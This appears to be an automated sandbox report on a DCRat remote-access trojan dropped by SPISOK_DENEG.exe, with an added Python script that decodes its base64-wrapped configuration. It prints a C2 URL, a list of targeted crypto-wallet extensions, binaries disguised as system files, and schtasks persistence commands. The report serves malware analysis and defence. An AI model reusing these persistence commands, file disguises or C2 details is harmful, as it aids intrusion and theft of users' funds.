Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\debug\backgroundTaskHost.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files (x86)\jDownloader\config\explorer.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\Default\Documents\dllhost.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\UxRLAXDP.log; Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\CqAggkYA.log; Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: 4.0.ChainPortsurrogate.exe.ea0000.0.unpack; Malware Configuration Extractor: DCRat {"C2 url": "http://77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn", "MUTEX": "DCR_MUTEX-NVL90ijyTJenukKzbFMD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\jDownloader\config\explorer.exe; ReversingLabs: Detection: 78%
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; ReversingLabs: Detection: 78%
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe; ReversingLabs: Detection: 78%
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe; ReversingLabs: Detection: 78%
Source: C:\Users\Default\Documents\dllhost.exe; ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\CqAggkYA.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\UxRLAXDP.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\YsSdHCtI.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\jYNBNfNl.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\tHgRxHTS.log; ReversingLabs: Detection: 29%
Source: C:\Windows\debug\backgroundTaskHost.exe; ReversingLabs: Detection: 78%
Source: SPISOK_DENEG.exe; Virustotal: Detection: 58%
Source: SPISOK_DENEG.exe; ReversingLabs: Detection: 73%
Source: Submitted sample; Integrated Neural Analysis Model: Matched 87.7% probability
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe; Joe Sandbox ML: detected
Source: C:\Windows\debug\backgroundTaskHost.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\explorer.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\tHgRxHTS.log; Joe Sandbox ML: detected
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe; Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe; Joe Sandbox ML: detected
Source: C:\Users\Default\Documents\dllhost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UxRLAXDP.log; Joe Sandbox ML: detected
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; Joe Sandbox ML: detected
Source: SPISOK_DENEG.exe; Joe Sandbox ML: detected
Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp; String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"False"}}
Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp; String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-NVL90ijyTJenukKzbFMD","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp; String decryptor: [["http://77777cm.nyashtyan.in/","externalpipejsprocessAuthapiDbtrackWordpressCdn"]]
Source: SPISOK_DENEG.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SPISOK_DENEG.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb; source: SPISOK_DENEG.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.pdb; source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp
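The string-decryptor output above is how DCRat stores its configuration: JSON arrays and objects wrapped in several layers of base64, which is why the short entry `WyIxIiwiIiwiNSJd` sits next to a long blob ending in `Il0=`, and why the extractor reports a C2 URL and a Params block that appear nowhere in the plain strings. The script below is an added example (not part of the report and not DCRat tooling) that peels such layers recursively: every string that base64-decodes to a JSON array or object is replaced by its contents, everything else (the mutex name, the short numeric strings, the long random token) is left untouched, and a depth-first search then pulls out the first dict keyed "0", "1", ..., the shape of the Params block the Malware Configuration Extractor printed. `DECRYPTED_STRINGS` is the second decryptor line from this page copied as a Python list; the `wrap` helper and the capped hop count are additions for this example.

```python
import base64
import binascii
import json
from typing import Any, Dict, List, Optional

# Input: the second "String decryptor" line above, as a Python list. Only two
# entries are base64-wrapped JSON; the rest must survive the decoder unchanged.
DECRYPTED_STRINGS: List[str] = [
    "bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF",
    "DCR_MUTEX-NVL90ijyTJenukKzbFMD",
    "0", "", "", "5", "2",
    "WyIxIiwiIiwiNSJd",
    "WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ==",
]


def _b64_json_layer(value: str) -> Any:
    """The JSON array or object hidden in a base64 string, or None if there is none.
    Scalars are deliberately rejected: "MTIz" is also valid base64 (of 123)."""
    try:
        obj = json.loads(base64.b64decode(value, validate=True).decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return obj if isinstance(obj, (list, dict)) else None


def peel(value: Any, hops: int = 0, max_hops: int = 8) -> Any:
    """Recursively replace every base64-wrapped JSON layer with its contents.
    max_hops bounds the recursion so a crafted blob cannot nest without limit."""
    if isinstance(value, str):
        inner = _b64_json_layer(value)
        if inner is None or hops >= max_hops:
            return value
        return peel(inner, hops + 1, max_hops)
    if isinstance(value, list):
        return [peel(v, hops, max_hops) for v in value]
    if isinstance(value, dict):
        return {k: peel(v, hops, max_hops) for k, v in value.items()}
    return value


def wrap(obj: Any) -> str:
    """One hop in the other direction (JSON then base64); used to build test vectors."""
    return base64.b64encode(json.dumps(obj).encode("utf-8")).decode("ascii")


def decode_all(strings: List[str]) -> List[Any]:
    """Peel every entry of a decryptor dump, leaving non-wrapped strings as they are."""
    return [peel(s) for s in strings]


def extract_params(value: Any) -> Optional[Dict[str, Any]]:
    """Depth-first search for the first dict whose keys are all "0", "1", ...:
    the layout of DCRat's Params block in the extractor output above."""
    if isinstance(value, dict):
        if value and all(k.isdigit() for k in value):
            return value
        children = list(value.values())
    elif isinstance(value, list):
        children = value
    else:
        return None
    for child in children:
        found = extract_params(child)
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    decoded = decode_all(DECRYPTED_STRINGS)
    print(json.dumps(decoded, indent=1))
    print("Params:", extract_params(decoded))
```

Accepting only arrays and objects as a layer is what keeps the decoder from rewriting innocent strings; without that check any four-character token that happens to be valid base64 of digits would be "decoded". The same peel step applied to the C2 pair on the next decryptor line is unnecessary, since that one is already plain JSON.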

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe; Code function: 0_2_000DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_000DA69B
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe; Code function: 0_2_000EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_000EC220
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user\Documents\desktop.ini
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user\AppData
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user\AppData\Local\Temp
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe; File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4 -> 104.21.16.1:80 (15 alerts, source ports 49736, 49738, 49739, 49740, 49741, 49827, 49880, 49897, 49926, 50012, 50013, 50014, 50015, 50016, 50017)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: 77777cm.nyashtyan.in
Source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Windows\debug\backgroundTaskHost.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Windows\debug\eddb19405b7ce1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D848E
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E4088
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E00B7
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D40FE
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E7153
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000F51C9
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E62CA
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D32F7
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E43BF
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000DC426
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000FD440
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000DF461
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E77EF
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D286B
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000FD8EE
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000DE9B7
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_001019F4
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E6CDC
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000E3E0B
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000F4F9A
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000DEFE2
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA08028
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA0C425
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA0C350
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA0A690
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA08E70
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA01222
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA08E7F
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BA148EE
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BB7DD62
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 4_2_00007FFD9BB7CFB6
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Code function: 8_2_00007FFD9BA01222
Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe | Code function: 29_2_00007FFD9B9E1222
Source: C:\Users\Default\Documents\dllhost.exe | Code function: 30_2_00007FFD9BA11222
Source: C:\Users\Default\Documents\dllhost.exe | Code function: 31_2_00007FFD9B9F1222
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Code function: 32_2_00007FFD9BA11222
Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe | Code function: 33_2_00007FFD9BA01222
Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Code function: 34_2_00007FFD9BA21222
Source: C:\Program Files (x86)\jDownloader\config\explorer.exe | Code function: 36_2_00007FFD9BA01222
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 40_2_00007FFD9BA11222
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 41_2_00007FFD9B9E1222
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Code function: 43_2_00007FFD9BA01222
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\CqAggkYA.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: String function: 000EF5F0 appears 31 times
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: String function: 000EEC50 appears 56 times
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: String function: 000EEB78 appears 39 times
Source: YsSdHCtI.log.4.dr, UxRLAXDP.log.4.dr, CqAggkYA.log.4.dr, tHgRxHTS.log.4.dr, jYNBNfNl.log.4.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SPISOK_DENEG.exe, 00000000.00000003.1675869870.0000000002B95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs SPISOK_DENEG.exe
Source: SPISOK_DENEG.exe, 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
Source: SPISOK_DENEG.exe, 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
Source: SPISOK_DENEG.exe, 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
Source: SPISOK_DENEG.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs SPISOK_DENEG.exe
Source: SPISOK_DENEG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@56/33@1/0
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000D6C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Code function: 0_2_000EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Program Files (x86)\jdownloader\config\explorer.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\Desktop\YsSdHCtI.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NVL90ijyTJenukKzbFMD
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | File created: C:\Users\user\AppData\Local\Temp\ji1uplb1
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
Source: unknown | Process created: C:\Program Files (x86)\jDownloader\config\explorer.exe
Source: unknown | Process created: C:\Program Files (x86)\jDownloader\config\explorer.exe
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Command line argument: sfxname (0_2_000EDF1E)
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Command line argument: sfxstime (0_2_000EDF1E)
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Command line argument: STARTDLG (0_2_000EDF1E)
Source: SPISOK_DENEG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SPISOK_DENEG.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 occurrences)
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SPISOK_DENEG.exe | Virustotal: Detection: 58%
Source: SPISOK_DENEG.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | File read: C:\Users\user\Desktop\SPISOK_DENEG.exe
Source: unknown | Process created: C:\Users\user\Desktop\SPISOK_DENEG.exe "C:\Users\user\Desktop\SPISOK_DENEG.exe"
Source: C:\Users\user\Desktop\SPISOK_DENEG.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe "C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\ProviderserverruntimeperfSvc\ctfmon.exe C:\ProviderserverruntimeperfSvc\ctfmon.exe
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f
